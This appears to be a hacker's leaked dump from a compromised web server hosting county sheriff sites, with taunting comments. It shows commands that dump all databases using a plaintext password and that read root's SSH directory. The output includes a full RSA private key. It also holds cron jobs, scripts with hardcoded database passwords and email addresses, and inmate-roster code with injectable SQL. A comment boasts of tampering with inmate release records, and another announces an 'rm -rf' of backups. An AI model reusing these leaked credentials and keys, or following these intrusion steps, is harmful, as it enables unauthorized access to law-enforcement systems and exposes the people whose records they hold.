-rw-r--r-- 1 root root 1898 May 3 09:09 csr.txt

drwxr-xr-x 3 root root 4096 Sep 20 2010 downloads

-rw-r--r-- 1 bocg psacln 0 Jun 21 14:23 huh

-rw-r--r-- 1 root root 1177 Mar 24 08:50 injection_patch.php

-rw-r--r-- 1 root root 1182 Mar 24 08:50 injection_patch.php.bak

-rw-r--r-- 1 root root 13552 Feb 4 2008 install.log

-rw-r--r-- 1 root root 2540 Feb 4 2008 install.log.syslog

-rwxrwxrwx 1 mosa psacln 803 Mar 24 2010 log.php

-rw------- 1 root root 1733 Nov 30 2010 mbox

-rw-r--r-- 1 root root 93 Aug 23 2010 md5look.php

-rw-r--r-- 1 root root 36773929 Jul 21 22:04 mysql_backup.sql.gz

-rw-r--r-- 1 root root 133498898 Jul 1 08:17

mysql_dump_20110701-081158.sql.gz

-rw-r--r-- 1 root root 144511936 Jul 8 10:59

mysql_dump_20110708-104506.sql.gz

-rw-r--r-- 1 root root 37564532 Jul 15 06:04

mysql_dump_20110715-060000.sql.gz

-rw-r--r-- 1 root root 38461089 Jul 22 11:18

mysql_dump_20110722-111716.sql.gz

drwxr-xr-x 2 root root 4096 Jun 20 09:46 p7zip

-rwxrwxrwx 1 mosa psacln 475 Mar 24 2010 parse_geocodes.php

-rw-r--r-- 1 root root 7164 Jul 5 14:20 perms.log

drwxr-xr-x 14 1002 1002 4096 Aug 23 2006 php-5.1.6

-rw-r--r-- 1 root root 8187896 Aug 23 2006 php-5.1.6.tar.gz

-rw-r--r-- 1 root root 21 Apr 22 10:16 phpinfo.php

drwxr-xr-x 9 root root 4096 Jul 21 16:24 psa

drwxrwxr-x 2 510 510 4096 Jun 3 2010 qmhandle-1.3.2

-rw-r--r-- 1 webdept webdept 15423 Apr 12 2010 qmhandle-1.3.2.tar.gz

-rw-r--r-- 1 root root 4293 Jun 21 17:48 recaptcha.log

-rw-r--r-- 1 root root 9751 Jun 21 16:04 recaptchalib.php

-rw-r--r-- 1 root root 9751 Jun 21 16:04 recaptchalib.php.bak

-rw-r--r-- 1 root root 9747 Jun 21 15:56 recaptchalib.php.bak.bak

drwxr-xr-x 3 root root 4096 Dec 21 2009 rootkit_checks

drwxr-xr-x 2 root root 4096 Jul 20 11:01 scripts

-rw-r--r-- 1 root root 32 Jun 21 14:54 sete.sh

-rw-r--r-- 1 root root 355812 Jun 21 14:22 tat E

drwxr-xr-x 6 root root 4096 Jun 21 15:38 tiny_mce

-rw-r--r-- 1 root root 2231 Jun 21 11:02 tiny_mce.php

-rw-r--r-- 1 root root 8957 Jun 21 14:50 tinymce.log

-rw-r--r-- 1 root root 6101 Jun 21 15:10 tinymce_php.log

-rw-r--r-- 1 root root 1141875 Jun 29 18:20 warrant_query.sql

-rw-r--r-- 1 root root 15503360 Jul 22 01:32 z

// FIRST LETS LOOT THIS MOFO

# mysqldump -q -u admin -p8w667nHzx%XFXb --all-databases --add-drop-table >

booty.sql

// GIMME THE KEYS TO YO HOUSE

# cat ~root/.ssh/*

ssh-rsa

AAAAB3NzaC1yc2EAAAABIwAAAQEA68pUVD3lTeQE5yDAWFOprdg05lmD0eaRznMwDgrAiZhhTEH/

D0crQDXJN5avBKIf1WdKBIi/AL7jlw4++CAdidYt1ZQ4VEQy3NVyVHqXmI/

FtE2sCjUlE8ID2u5Mm5X8Xf57ifkXlrSF6HgLwa8P4KxP3HqrZNgb93hRwP/

VPLkNA7Ef6pkjCMpcOtE0qYynDLswAQhW9abqhiCeWaHHPPTRwjlk0r/vHPwBns777pj5UgU3RkUG9/

1X70tKdZJR5Mp961WDGy3sC7Qi0hiM/

A3tRdo2NKpiZje0oRX3x8WH69vO9ZITeYcxcfu0o9AwiIVHzxJ/DmzFGbRtZ3W/Hw==

root@ip-72-167-49-108.ip.secureserver.net

ssh-dss

AAAAB3NzaC1kc3MAAACBAO/Ikm7ZPgaBYr1OlCnI4h82hB2pEppq24r+VR7/

MVdKMKmUsQWYvZQG4CPphcXfUEY2sxBbAfSp53eR4AtBYomspYREzF045+

dgtLj2o7MjDYacAt4KpjuxzglGT2H4hyRhz3fWJSzyubpeeb09nPDNxXOg0l/

hJgPJWi8XjSj7AAAAFQD9MwyYL/

DDniuYXNRBcaAAGEXl2wAAAIEAneCU3pUZ44NFoOqQF74GZjbb0XW8r6vVCwCMpoW1F3H5OcDxMSDUOE

iZTil70hIQBelB8cus3xzn9NBQx/s/47Sb655IRYZDMWU8rwGzTP7U9/

AiciF0sLrKsyqpbNLlDl79b9wBEkkpO6ELJDPYHK0cVfD0gReeG/vhnQbXYcEAAACBAKrwVdO/

7dFdKX9wZzvzA89DLWx1lpIJmbteKzsmIIAoJJgfw7gITb0hKnaRw8v5xQgmC379VRfWC31feB4dORrj

njKLQLjBiu8jHeL+WqQ/vp/Fg9XhioLDwWHUb5iVrv0VeRbn8Q//

ltLrbBcqD0dslZ1nRN8i0NCY11B5ubq3 root@ip-72-167-49-122.ip.secureserver.net

-----BEGIN RSA PRIVATE KEY-----

MIIEowIBAAKCAQEAwIP5sXbYS2wsbN8nFPHLzF2qHi/A/eRBcO8CrAtYk8akXpG7

ROZUdqlD/LnOfjykC+gv8qi8lWrnU9p/p5VjY8Gcv1JWLAfv5+GeA5bFnOpf1ZD7

gvUdFQXzK5JcFH0V03sJkV1m/oRHQ+V6t7HxTRfiaXLuuT/PCxo4tUuxeaOBJaWd

2sLYQaPOb6z27UDafPPg7o7mO0HPCxDSsPW07P0s+xB5QCsk84cFchImi8oZyPwK

6ySGvtY0YQRTE1Ixek86d/UM64PY/R5QvXy61FfbnVqlfbD5LbXM+6yLxhxSeHUy

MGpWkXRMrhroA71e1T68rHZU7qoALHZrdsL8hQIBIwKCAQEAn4NLO0U232hCERCr

Wn8z1TeqNkTTG4Kcn2bzld2D6Cg/DIdgps15Lx6IyhZMAjI+yAmG0F/stlFDVBtx

FdOM3aBr7vsUMxyE81SKPXzs4Rn3olOOkRQ8qwTuDijP87gZZhV89Mm7vPFCXNQV

OR5o2XowoIPNHSY91f/IljdnKkQ05862XywXDqKA4ZURgs2WhCSCGU+bMQ/HcrXx

whUi5tWgAH9JTd8cVHbTFNHS9nyf3rsqoKsPjUJZot+RpvBzUk75VsKxEm/NpPUz

foMVR/H0vHl1Y5rv6P0fLzBPUBPBSqM94ELa3niBgsOJsdmzWGUnuZjoYX2Q5RCD

qa5NHwKBgQDscK4JiSdSh7egaKrFqpDECVR3PtE0gsluxT0am6UmrelZIlILmfFf

a3J3QHnGzSPuIJit1Px1su5Jt6qwc2R98DRmGgb2n8BHdNQTU1bpmD4K9iwMD8fx

5bPNLcC69xKD9TSDS6FaHQRHdLnpwuho3m5mlbGISlVOCtU8/yTnUwKBgQDQcQ/B

CuHlfB86NIwTTIvTjYUBotk0NqMgHHyLeoZ+mz4kZWKZl7Dp9gC7lA3ljFZh4jIG

VD8hlmLflVSjY7EFDEjB7GQ3wsEMGXqVVd/jsE4TNnizehxhUh/0pp/bBHZg0OWZ

Lmak2rJxvt7uI5Bs9g+huy+Q3zi8oz3NW2HJxwKBgQDYLIHc1StEJFAdoYYxEPli

xrOgOW7Q7Jro7tjH3sLhiQ/cdyZxAca9pBDiDxBAu46QktS8MHHKsjjy8REWWt+J

FiFHaEDhfB2DKPxpcMR9zQWGXWoZqAdDkC9cgZpEih+Olwtwui0fMHjw37/rquMe

DTG84KJQuP2JLnnRXk2gSwKBgQDEh9unYggwJJJ4tTOdKuo8fh5R//FdHZJ9XK/x

OQJ3Xyv2bjhk7hvVRwgBURRqt4Slbt61gqHsd9mQ+oMAc/AMEuWDpF59t6ASuO/r

40DPXRZp4ubVG1yWRh4hL2OFW/qVzEYxV6Kbbx1GrKZOPsoAVbb3kzt59wmb6l7X

kKyoTQKBgEtKR9eP5drKiFtGbanMoe4R01yeoda8GcbHenuW8f4+SIzXS0BRYDMG

JccKz/XyIk+uxGS+qRDWUS3KFWz8/PUEpLOAEuCv45GpyUVb6XS7O6dn6uVRwEUr

UYo6Q+HxQ0ZvBOxtG/usuR0ykiV60GuTxjxVXE6urOWSaypWOaUc

-----END RSA PRIVATE KEY-----

ssh-rsa

AAAAB3NzaC1yc2EAAAABIwAAAQEAwIP5sXbYS2wsbN8nFPHLzF2qHi/A/

eRBcO8CrAtYk8akXpG7ROZUdqlD/LnOfjykC+gv8qi8lWrnU9p/p5VjY8Gcv1JWLAfv5+

GeA5bFnOpf1ZD7gvUdFQXzK5JcFH0V03sJkV1m/oRHQ+V6t7HxTRfiaXLuuT/

PCxo4tUuxeaOBJaWd2sLYQaPOb6z27UDafPPg7o7mO0HPCxDSsPW07P0s+

xB5QCsk84cFchImi8oZyPwK6ySGvtY0YQRTE1Ixek86d/UM64PY/R5QvXy61FfbnVqlfbD5LbXM+

6yLxhxSeHUyMGpWkXRMrhroA71e1T68rHZU7qoALHZrdsL8hQ==

root@ip-97-74-115-143.ip.secureserver.net

72.167.49.114 ssh-rsa

AAAAB3NzaC1yc2EAAAABIwAAAQEAnNcO5j+

xTWrszbZLZ7pdvvqTumaACzgJNW773NBt8laQEq0HUDfdt3tg5LpaIWQTOBD45jjkyiM2QNJq9CliNfJ

BnOajtUI90IN2M3xK78ihiHAsp4jdX6kKcpyQrffQ5i8fDllfQmcD/

7gndTzo273l8BmhQnvIxOTZwGcQPCnylQ7mxmV/KmRUF5uvo2dAkxSZnmOyDEMZLAAcic/+

98cBbxpXu4154ZLG8pXAJ3ASzm7oC4KsC0T2eFt6Um3/BVNMydFc9KiVbyBy4mUda8/

icvq90TYue3wXWIGwhIPMafSHst6SVAo1m9KLsCA3y1FbHEwK6YzUVi0ZtNmfRw==

72.167.49.108 ssh-rsa

AAAAB3NzaC1yc2EAAAABIwAAAQEA6QYFzjOfwhDhJbKf7tN3CcP2VN5euOPRtuDEtuo8Hm4loFsKsVu/

Z4AAObT4nhksaowpND8vzfGikitgZibICYLlMcx8JjHFKaaqmbVYocVdm8HpHmYAvII3BJkIZJ9hT7IR

hp1bc4z/KeUgDVquCR4ak4f4hL9eY0w8Cxc3oM/jYw/bFg+nIBs0dctch3Pw/

4pREyBPO8p2BReWI7WlcA1i4NdzhoevE+

2qsvMzVWp7HGCIGOQDKgbBL65m2bJrDOZELrvDcBcdrogIpqLO6kSXOnjjVKdcT7zpQuFPR+7wj6t/

fyMcYPx80XmaDzKbGbNpHSPVsKTJsHqh+NRnqQ==

ssh-dss

AAAAB3NzaC1kc3MAAACBAO/Ikm7ZPgaBYr1OlCnI4h82hB2pEppq24r+VR7/

MVdKMKmUsQWYvZQG4CPphcXfUEY2sxBbAfSp53eR4AtBYomspYREzF045+

dgtLj2o7MjDYacAt4KpjuxzglGT2H4hyRhz3fWJSzyubpeeb09nPDNxXOg0l/

hJgPJWi8XjSj7AAAAFQD9MwyYL/

DDniuYXNRBcaAAGEXl2wAAAIEAneCU3pUZ44NFoOqQF74GZjbb0XW8r6vVCwCMpoW1F3H5OcDxMSDUOE

iZTil70hIQBelB8cus3xzn9NBQx/s/47Sb655IRYZDMWU8rwGzTP7U9/

AiciF0sLrKsyqpbNLlDl79b9wBEkkpO6ELJDPYHK0cVfD0gReeG/vhnQbXYcEAAACBAKrwVdO/

7dFdKX9wZzvzA89DLWx1lpIJmbteKzsmIIAoJJgfw7gITb0hKnaRw8v5xQgmC379VRfWC31feB4dORrj

njKLQLjBiu8jHeL+WqQ/vp/Fg9XhioLDwWHUb5iVrv0VeRbn8Q//

ltLrbBcqD0dslZ1nRN8i0NCY11B5ubq3 root@ip-72-167-49-122.ip.secureserver.net

// NOW LETS SEE WHAT YOU WORKING WITH

# cat ~root/scripts/*

#!/bin/sh

datex=$(date +'%Y%m%d-%H%M%S')

file=mysql_dump_$datex.sql.gz

echo Backup is $file

PASSWORD=`cat /etc/psa/.psa.shadow`

mysqldump -q -u admin -p$PASSWORD --all-databases --add-drop-table | gzip >

~/$file

0,15,30,45 * * * * /usr/local/psa/admin/sbin/backupmng >/dev/null

2>&1

0 1 * * 1 /usr/local/psa/libexec/modules/watchdog/cp/secur-check

0 1 * * 1 /usr/local/psa/libexec/modules/watchdog/cp/send-report

weekly

10 1 * * * /usr/local/psa/libexec/modules/watchdog/cp/clean-

sysstats

15 1 * * * /usr/local/psa/libexec/modules/watchdog/cp/pack-

sysstats day

15 1 * * 1 /usr/local/psa/libexec/modules/watchdog/cp/pack-

sysstats week

15 1 1 * * /usr/local/psa/libexec/modules/watchdog/cp/pack-

sysstats month

15 1 1 * * /usr/local/psa/libexec/modules/watchdog/cp/pack-

sysstats year

20 1 * * * /usr/local/psa/libexec/modules/watchdog/cp/clean-

events

0 3 * * 7 /usr/local/psa/libexec/modules/watchdog/cp/clean-

reports

0 22 * * * /root/scripts/mySQLbackup.sh | mail -s

"mySQL Backup" test@mostwantedwebsites.net

50 23 * * * /usr/bin/rsnapshot daily

40 23 * * 6 /usr/bin/rsnapshot weekly

0 1 * * * /usr/bin/php

/var/www/vhosts/baxtercountysheriff.com/httpdocs/admin_dymin/modules/most_wanted

/config/delete_cron.php

*/5 * * * * /usr/bin/php

/var/www/vhosts/baxtercountysheriff.com/home/parse_xml.php >/dev/null 2>&1

*/5 * * * * /usr/bin/php

/var/www/vhosts/lawrencecosheriff.com/home/parser.php >/dev/null 2>&1

#*/5 * * * * /usr/bin/php

/var/www/vhosts/mostwantedwebsites.net/subdomains/lawmo/httpdocs/home/parser.php

>/dev/null 2>&1

*/5 * * * * /usr/bin/php

/var/www/vhosts/cherokeecountyalsheriff.com/home/parser.php >/dev/null 2>&1

*/5 * * * * /usr/bin/php

/var/www/vhosts/jocomosheriff.org/home/parse_roster.php >>

/backup/johms_parse_log.txt

*/5 * * * * /usr/bin/php

/var/www/vhosts/stonecountymosheriff.com/home/parse_roster.php >>

/backup/stoms_parse_log.txt 2>&1

*/5 * * * * /usr/bin/php

/var/www/vhosts/crosscountysheriff.org/home/Cross\ County/parse_pcv.php

>/dev/null 2>&1

*/5 * * * * /usr/bin/php

/var/www/vhosts/boonesheriff.com/home/parse_pcv.php >/dev/null 2>&1

*/16 * * * * /usr/bin/php

/var/www/vhosts/crosscountysheriff.org/home/Cross\ County/warrant_parser.php

>/dev/null 2>&1

*/15 * * * * /usr/bin/php

/var/www/vhosts/boonesheriff.com/home/warrant_parser.php >/dev/null 2>&1

*/15 * * * * /usr/bin/php

/var/www/vhosts/tunicamssheriff.com/httpdocs/RPC/test.php >/dev/null 2>&1

*/10 * * * * /usr/bin/php

/var/www/vhosts/jonesso.com/home/parse.php >> /backup/JONMS_INMATE_ROSTER.log

2>&1

*/15 * * * * /usr/bin/php

/var/www/vhosts/prattcountysheriff.com/home/parse_roster.php >/dev/null 2>&1

*/15 * * * * /usr/bin/php

/var/www/vhosts/prattcountysheriff.com/home/parse_warrants.php >/dev/null 2>&1

*/15 * * * * /usr/bin/php

/var/www/vhosts/jeffersoncountykssheriff.com/home/parse_roster.php >>

/backup/jcsoks_inamte_parse_log.txt

*/5 * * * * /usr/bin/php

/var/www/vhosts/stfranciscountysheriff.org/home/parse_pcv.php >/dev/null 2>&1

*/5 * * * * /usr/bin/php

/var/www/vhosts/howardcountysheriffar.com/home/parse_pcv.php >/dev/null 2>&1

0 6 * * * /usr/bin/php

/var/www/vhosts/baxtercountysheriff.com/httpdocs/admin/publish_roster.php

>/dev/null 2>&1

5 6 * * * /usr/bin/php

/var/www/vhosts/crosscountysheriff.org/httpdocs/admin/modules/inmate_roster/

publish.php >/dev/null 2>&1

10 6 * * * /usr/bin/php

/var/www/vhosts/cherokeecountyalsheriff.com/httpdocs/admin/modules/inmate_roster

/publish.php >/dev/null 2>&1

15 6 * * * /usr/bin/php

/var/www/vhosts/lawrencecosheriff.com/httpdocs/admin/modules/inmate_roster/

publish.php >/dev/null 2>&1

20 6 * * * /usr/bin/php

/var/www/vhosts/tunicamssheriff.com/httpdocs/admin/modules/inmate_roster/publish

.php >/dev/null 2>&1

30 6 * * * /usr/bin/php

/var/www/vhosts/boonesheriff.com/httpdocs/admin/modules/inmate_roster/publish.

php >/dev/null 2>&1

0 10 * * * /usr/bin/php

/var/www/vhosts/prattcountysheriff.com/httpdocs/admin/modules/inmate_roster/

publish.php >/dev/null 2>&1

25 6 * * * /usr/bin/php

/var/www/vhosts/jocomosheriff.org/httpdocs/admin/modules/inmate_roster/publish.

php >/dev/null 2>&1

40 6 * * * /usr/bin/php

/var/www/vhosts/jeffersoncountykssheriff.com/httpdocs/admin/modules/

inmate_roster/publish.php >/dev/null 2>&1

50 6 * * * /usr/bin/php

/var/www/vhosts/jonesso.com/httpdocs/admin/modules/inmate_roster/publish.php

>/dev/null 2>&1

50 5 * * * /usr/bin/php

/var/www/vhosts/stfranciscountysheriff.org/httpdocs/admin/modules/inmate_roster/

publish.php >/dev/null 2>&1

0 2 * * * /usr/bin/php

/var/www/vhosts/marionsoal.com/httpdocs/admin/modules/inmate_roster/cron/cron.

php

40 1 * * * /usr/bin/find /var/www/vhosts/ -mtime -1

| /bin/grep -v statistics | /bin/grep -v counter 2>&1 | perl -wple 'BEGIN{print

"Changed Web Files - New GoDaddy"}'| mail -s "Changed Web Files - GoDaddy" -c

bnewman@bjmweb.com -c galexander@bjmweb.com -c markm@bjmweb.com root

0 * * * * /usr/bin/find

/var/www/vhosts/*/httpdocs/uploads/*.php | grep -v -e

"watermark_wanted_photo.php" -e "checkimages.php" | mail -s "Go Daddy - Upload

Scanner" -c galexander@bjmweb.com -c markm@bjmweb.com -c bnewman@bjmweb.com root

0 1 * * * /backup/mail_logs/parse_mail_log.sh

1 0 * * * /usr/bin/php

/var/www/vhosts/grantcountyar.com/httpdocs/cron/purge_events.php

1 0 * * * /usr/bin/php

/var/www/vhosts/crosscountyar.org/httpdocs/cron/purge_events.php

1 0 * * * /usr/bin/php

/var/www/vhosts/izardhometownhealth.com/httpdocs/cron/purge_events.php

1 0 * * * /usr/bin/php

/var/www/vhosts/crosscountysheriff.org/httpdocs/cron/purge_events.php

1 0 * * * /usr/bin/php

/var/www/vhosts/cityofwynne.com/httpdocs/cron/purge_events.php

1 0 * * * /usr/bin/php

/var/www/vhosts/boonecountyar.com/httpdocs/cron/purge_events.php

1 0 * * * /usr/bin/php

/var/www/vhosts/barrycountysheriff.com/httpdocs/cron/purge_wanted.php

1 0 * * * /usr/bin/php

/var/www/vhosts/izardcountyar.org/httpdocs/cron/purge_events.php

1 0 * * * /usr/bin/php

/var/www/vhosts/mosheriffs.com/httpdocs/cron/cron.php

1 0 * * * /usr/bin/php

/var/www/vhosts/stfranciscountysheriff.org/httpdocs/cron/purge_events.php

1 0 * * * /usr/bin/php

/var/www/vhosts/knoxcountysheriffil.com/httpdocs/cron/purge_events.php

*/2 * * * * /usr/bin/php

/var/www/vhosts/gra_upload_scanner.php >/dev/null 2>&1

0 1 * * *

/var/www/vhosts/mostwantedwebsites.net/subdomains/code/httpdocs/search/cron.sh

>/dev/null

#

# BCSD Site Search Cron

0 1 * * * cd

/var/www/vhosts/baxtercountysheriff.com/httpdocs/search/admin/ && /usr/bin/php

/var/www/vhosts/baxtercountysheriff.com/httpdocs/search/admin/spider.php -u

http://baxtercountysheriff.com/ -r -n

http://baxtercountysheriff.com/warrants.php?find=all >/dev/null 2>&1

#

# CRCSD Site Search Cron

5 1 * * * cd

/var/www/vhosts/crosscountysheriff.org/httpdocs/search/admin/ && /usr/bin/php

/var/www/vhosts/crosscountysheriff.org/httpdocs/search/admin/spider.php -u

http://crosscountysheriff.org/ -r -n

http://crosscountysheriff.org/warrants.php?find=all >/dev/null 2>&1

#

#

# MCSD Site Search Cron

10 1 * * * cd

/var/www/vhosts/marioncountysheriffar.com/httpdocs/search/admin/ && /usr/bin/php

/var/www/vhosts/marioncountysheriffar.com/httpdocs/search/admin/spider.php -u

http://marioncountysheriffar.com/ -r -n

http://marioncountysheriffar.com/warrants.php?find=all >/dev/null 2>&1

#

#

# SFSOAR Site Search Cron

15 1 * * * cd

/var/www/vhosts/stfranciscountysheriff.org/httpdocs/search/admin/ &&

/usr/bin/php

/var/www/vhosts/stfranciscountysheriff.org/httpdocs/search/admin/spider.php -u

http://stfranciscountysheriff.org/ -r -n

http://stfranciscountysheriff.org/warrants.php?find=all >/dev/null 2>&1

#

#

# GCSOMS Site Search Cron

0 1 * * * cd

/var/www/vhosts/georgecountymssheriff.com/httpdocs/search/admin/ && /usr/bin/php

/var/www/vhosts/georgecountymssheriff.com/httpdocs/search/admin/spider.php -u

http://georgecountymssheriff.com/ -r -n

http://georgecountymssheriff.com/warrants.php?find=all >/dev/null 2>&1

#

#

# CPSOLA Site Search Cron

0 1 * * * cd

/var/www/vhosts/cameronso.org/httpdocs/search/admin/ && /usr/bin/php

/var/www/vhosts/cameronso.org/httpdocs/search/admin/spider.php -u

http://cameronso.org/ -r -n http://cameronso.org/warrants.php?find=all

>/dev/null 2>&1

#

#

# MCSOGA Site Search Cron

0 1 * * * cd

/var/www/vhosts/meriwethercountysheriff.org/httpdocs/search/admin/ &&

/usr/bin/php

/var/www/vhosts/meriwethercountysheriff.org/httpdocs/search/admin/spider.php -u

http://meriwethercountysheriff.org/ -r -n

http://meriwethercountysheriff.org/warrants.php?find=all >/dev/null 2>&1

#

47 23 * * * /usr/sbin/ntpdate -b -s time.nist.gov

#!/bin/sh

PASSWORD=`cat /etc/psa/.psa.shadow`

mysqldump -u admin -p$PASSWORD --all-databases --add-drop-table |gzip -v9 >

/root/mysql_backup.sql.gz

#!/bin/bash

#

# Scan for PHP in upload folders

#

MAILTO="-c galexander@bjmweb.com -c markm@bjmweb.com -c bnewman@bjmweb.com root"

EXCLUDES="-e watermark_wanted_photo.php -e checkimages.php -e

watermark_recalled_photo.php"

lineify (){

for i in $*

do

echo $i

done

}

# testing

#EXCLUDES="numnum"

#MAILTO="jwiegand@bjmweb.com"

#

UHOH=$(/usr/bin/find /var/www/vhosts/*/httpdocs/uploads/*.php | \

grep -v $EXCLUDES)

if [ "${UHOH}xx" != "xx" ]

then

lineify $UHOH | mail -s "Go Daddy - Upload Scanner" $MAILTO

fi

// HARDCODED MYSQL ROOT PASSWORDS... THE SIGN OF ANY SECURE SYSADMIN

# cat ~root/MASS_PASS/masspass.php

<?php

error_reporting(0);

if(php_sapi_name() == 'cli' && empty($_SERVER['REMOTE_ADDR'])) {

echo md5('Y9BNtSeb').PHP_EOL;

//custom safe_query, should work like normal, just allows passing of custom

connect

function safe_query($q, $u='', $p='', $d='', $s='localhost'){

$l = mysql_connect($s,$u,$p) or die("ERROR: Could not connect with USER:

$u PASS: $p ".PHP_EOL.mysql_error);

if($d != ''){

mysql_select_db($d,$l) or die("ERROR: Could not select DATABASE:

$d".PHP_EOL);

}

$r = mysql_query($q,$l)/* or die("ERROR: Could not execute QUERY: $q

".PHP_EOL.mysql_error()) */;

return $r;

}

$GD_USER = 'admin';

$GD_PASS = '8w667nHzx%XFXb';

$GD_SERV = 'localhost';

$options = getopt("n::o::");

$query = 'SHOW DATABASES';

$result = safe_query($query, $GD_USER, $GD_PASS, '', $GD_SERV);

while($row = mysql_fetch_array($result,MYSQL_NUM)){

$query = 'SELECT password FROM dymin_user WHERE username = "bjm"';

$r = safe_query($query, $GD_USER, $GD_PASS, $row[0], $GD_SERV);

echo $row[0].' - '.mysql_result($r,0,'password').PHP_EOL;

if(isset($options['n']) && isset($options['o'])){

//echo 'UPDATE dymin_user SET password =

"'.mysql_escape_string($options['n']).'" WHERE username = "bjm" AND password =

"'.mysql_escape_string($options['o']).'"'.PHP_EOL;

safe_query('UPDATE dymin_user SET password =

"'.mysql_escape_string($options['n']).'" WHERE username = "bjm" AND password =

"'.mysql_escape_string($options['o']).'"', $GD_USER, $GD_PASS, '', $GD_SERV);

}

}

}else{

echo 'This script can only be ran from the command line!'.PHP_EOL;

exit();

}

?>

// GOTTA MAKE SURE TO RM -RF THIS PART FIRST

# ls -al /backup

total 318424

drwxr-xr-x 9 root root 4096 Jul 14 11:30 .

drwxr-xr-x 26 root root 4096 Feb 22 22:21 ..

-rw-r--r-- 1 root root 17015 Jul 14 2010 ActiveWarrantsList.txt.back

-rw-r--r-- 1 root root 175 May 12 09:36 BCSD_PARSE_XML

drwxrwxrwx 2 root root 4096 Jun 29 18:23 BOCS_WARRANTS

drwxrwxrwx 2 root root 4096 Jun 29 18:24 CRCSD_WARRANTS

-rwxrwxrwx 1 root root 20852332 Jul 22 22:20 JONMS_INMATE_ROSTER.log

-rw-r--r-- 1 root root 90737 Mar 2 08:50 JONMS_INMATE_ROSTER.log.2.gz

-rwxrwxrwx 1 root root 324196 Feb 7 09:20 JONMS_INMATE_ROSTER.log.gz

-rwxrwxrwx 1 root root 286813 Oct 28 2010 JONMS_INMATE_ROSTER.log.gz.0

-rwxrwxrwx 1 root root 88758 Aug 10 2010 JONMS_INMATE_ROSTER.log.gz.1

-rw-r--r-- 1 root root 13864960 Apr 21 08:19 POALAC04212011.tar

-rw-r--r-- 1 root root 10833920 Mar 7 16:53 POALAC_BACKUP.tar

-rw-r--r-- 1 root root 13864960 Apr 20 16:09 POALAC_BACKUP_04202011.tar

drwxrwxrwx 2 root root 4096 Jun 29 18:24 SFSOAR_WARRANTS

-rw-r--r-- 1 root root 68177920 May 3 09:47 arsa.05032011.tar

drwxr-xr-x 3 root root 4096 Apr 21 11:06 bcsd

-rw-r--r-- 1 root root 55494137 Jul 22 22:20 crcsd_query_log.txt

-rw-r--r-- 1 root root 1080247 Apr 7 13:05 crcsd_query_log.txt.04072011.gz

-rwxrwxrwx 1 root root 4181055 Feb 7 09:25 crcsd_query_log.txt.gz

-rw-r--r-- 1 root root 116504777 Jul 22 22:15 jcsoks_inamte_parse_log.txt

-rw-r--r-- 1 root root 527887 Apr 7 13:00

jcsoks_inamte_parse_log.txt.04072011.gz

-rwxrwxrwx 1 root root 1568892 Feb 7 09:15 jcsoks_inamte_parse_log.txt.gz

-rw-r--r-- 1 root root 411831 Sep 13 2010 jcsoks_inamte_parse_log.txt.gz.0

-rwxrwxrwx 1 root root 736089 Feb 8 13:44 jcsoks_query_log.txt.gz

-rw-r--r-- 1 root root 12029931 Jul 22 22:20 johms_parse_log.txt

-rw-r--r-- 1 root root 52276 Jun 14 13:30 johms_parse_log.txt.06142011.gz

-rw-r--r-- 1 root root 24206 Mar 18 10:55 johms_parse_log.txt.gz

drwxr-xr-x 2 root root 4096 Jul 22 01:00 mail_logs

drwxr-xr-x 4 root root 4096 Jul 6 2010 parse_logs

drwx------ 13 root root 4096 Feb 23 00:50 snapshots

-rw-r--r-- 1 root root 3680191 Jul 22 22:21 stoms_parse_log.txt

-rw-r--r-- 1 root root 890880 Mar 2 09:18 z

// NOW THIS LOOKS INTERESTING

// YOU BETTER BELIEVE WE CALLED release_inmate() MORE THAN A FEW TIMES

# cat /var/www/vhosts/jocomosheriff.org/home/parse_roster.php

<?

if(date('d') == '1' && date('H') < '2'){

shell_exec('rm /backup/johms_parse_log.txt');

}

function safe_query($query){

$link = mysql_connect('localhost','johms','4smhoj2');

mysql_select_db('JOHMS',$link);

return mysql_query($query,$link);

}

function parse_csv($filename,$target_table,$field_map){

$file = file($filename);

$inmates = array();

foreach($file as $line_num => $line_data){

$query = 'INSERT INTO '.$target_table.' SET ';

$line_data = explode(',',$line_data);

$i=0;

$inmates[] = $line_data[0];

foreach($field_map as $field_num => $db_field){

if($db_field == 'booking_date'){

$line_data[$field_num] =

date('Y-m-d',strtotime($line_data[$field_num])).'", booking_time =

"'.substr($line_data[$field_num],-8).'';

//echo $line_data[$field_num],PHP_EOL;

}

if($i != 0){

$query .= ', '.$db_field.' = "'.$line_data[$field_num].'"';

}else{

$query .= $db_field.' = "'.$line_data[$field_num].'"';

}

$i++;

}

//echo $query,PHP_EOL;

safe_query($query);

unset($query);

}

return $inmates;

}

function release_inmate($booking_num){

$date = date("Y-m-d");

$time = date("Hi");

$query = "update dymin_jail_roster set release_date = '$date',

release_time = '$time' where booking_num = '$booking_num'";

safe_query($query);

}

function is_in_jail($booking_number){

$query = "select booking_num from dymin_jail_roster where booking_num =

'$booking_number'";

$result = safe_query($query);

$num = mysql_num_rows($result);

if($num == ''){return false;}else{return true;}

}

function build_old_inmates(){

$inmates = array();

$r = safe_query('SELECT * FROM dymin_jail_roster WHERE release_date =

""');

while($row = mysql_fetch_array($r)){

$inmates[] = $row['booking_num'];

}

return $inmates;

}

function build_new_inmates(){

$inmates = array();

$file =

file('/var/www/vhosts/jocomosheriff.org/home/Export/RosterExport.txt');

foreach($file as $line => $data){

$inmates[] = array_shift(explode(',',$data));

}

if(sizeof($inmates)<1){

echo PHP_EOL,date('m/d/Y H:i:s'),' -- Roster File was

Empty',PHP_EOL;

die();

}

return $inmates;

}

function remove_old_inmates(){

$now = time();

$forty_eight_hours_ago = date('Y-m-d', mktime(0, 0, 0, date("m", $now)

, date("d", $now)-2, date("Y", $now)));

$query = "select booking_num, image1 from dymin_jail_roster where

release_date <= '$forty_eight_hours_ago' and release_date != ''";

$result = safe_query($query);

while($row = mysql_fetch_array($result,MYSQL_ASSOC)){

shell_exec('rm -f

/var/www/vhosts/jocomosheriff.org/httpdocs/images/inmates/resized/'.$row['image1

']);

$query_charges = 'delete from dymin_jail_roster_charges where

booking_num = "'.$row['booking_num'].'"';

safe_query($query_charges);

$query_inmate = 'delete from dymin_jail_roster where booking_num =

"'.$row['booking_num'].'"';

safe_query($query_inmate);

}

}

$field_map[0] = 'booking_num';

$field_map[2] = 'age';

$field_map[3] = 'gender';

$field_map[4] = 'race';

$field_map[5] = 'first_name';

$field_map[6] = 'middle_name';

$field_map[7] = 'last_name';

$field_map[8] = 'booking_date';

$field_map[9] = 'arresting_agency';

$field_map[10] = 'image1';

if(is_file('/var/www/vhosts/jocomosheriff.org/home/Export/RosterExport.txt')

